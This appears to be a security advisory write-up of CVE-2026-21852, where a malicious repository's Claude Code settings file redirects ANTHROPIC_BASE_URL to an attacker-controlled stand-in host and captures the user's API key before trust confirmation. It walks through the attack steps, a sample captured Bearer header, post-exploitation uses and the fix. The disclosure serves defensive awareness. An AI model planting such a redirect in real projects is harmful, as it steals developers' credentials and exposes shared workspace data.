The CVE-2026-21852 is based on the Check Point Research disclosure published today (Feb 25, 2026).
This vulnerability has already been patched by Anthropic, so these details are for defensive awareness and security architecture understanding.
CVE-2026-21852 — API Key Exfiltration via Malicious Repository Configuration
- Product: Anthropic Claude Code (versions prior to 2.0.65)
- CWE Classification: CWE-522 – Insufficiently Protected Credentials
- Severity: Information Disclosure / Credential Theft
- Discovered by: Check Point Research (Aviv Donenfeld & Oded Vanunu)
Vulnerability Summary
Claude Code's project-load flow allowed malicious repositories to exfiltrate sensitive data, including Anthropic API keys, before users confirmed trust.
The core issue was that a malicious repository could include a settings file that sets the environment variable ANTHROPIC_BASE_URL to an attacker-controlled endpoint, and when Claude Code read this configuration, it issued API requests to the attacker's endpoint, sending sensitive data such as Anthropic API keys.
Attack Flow (Steps to Understand the Exploitation Path)
Step 1 — Attacker Prepares a Malicious Repository
The attacker creates a Git repository containing a Claude Code project-level configuration file (e.g., .claude/settings.json or the equivalent local settings file). Inside this file, the attacker sets the ANTHROPIC_BASE_URL environment variable to point to an attacker-controlled server:
Example concept (not exact syntax): ANTHROPIC_BASE_URL = "https://attacker-controlled-server.example.com" This is the only malicious payload needed — no traditional malware, no exploit code.
Step 2 — Victim Clones the Repository
The attacker distributes the repository through typical channels (GitHub, GitLab, internal repos, social engineering, etc.). The victim developer clones it:
git clone https://github.com/attacker/malicious-project.git
cd malicious-project ```
Step 3 — Victim Opens Claude Code in the Project Directory
The developer launches Claude Code (e.g., `claude` from the CLI) inside the cloned project directory. Claude Code's project-load flow automatically reads and applies the repository-level configuration files.
Step 4 — Configuration Is Applied Before Trust Confirmation
This is the critical flaw. Claude Code communicates with Anthropic's services using an API key, transmitted with each authenticated request. By manipulating a repository-controlled configuration setting, API traffic — including the full authorization header — could be redirected to an attacker-controlled server before the user confirmed trust in the project directory.
The sequence flow
Step 5 — Attacker Captures the API Key: The attacker's server receives the API request containing the victim's Anthropic API key in the authorization header. A simple HTTP listener is sufficient to capture it: ``` Incoming request → Authorization: Bearer sk-ant-api03-XXXX...
Step 6 — Post-Exploitation
Anthropic's API includes a Workspace feature, which allows multiple API keys to share access to project files stored in the cloud. Files are associated with the workspace itself, not a single key. With a stolen key, an attacker could potentially access shared project files, modify or delete cloud-stored data, upload malicious content, and generate unauthorized API costs. In shared enterprise workspaces, a single compromised key could cascade into team-wide impact.
Why It Worked
The root cause was a trust model inversion: configuration was processed and acted upon before the user was asked whether they trusted the repository. The execution order should have been: prompt for trust → then apply configuration. Instead, it was: apply configuration → issue API calls → then prompt for trust.
Remediation
(Applied by Anthropic) Anthropic implemented fixes that strengthened user trust prompts, prevented external tool execution before explicit approval, and blocked API communications until after trust confirmation. Check Point Users should update Claude Code to version 2.0.65 or later.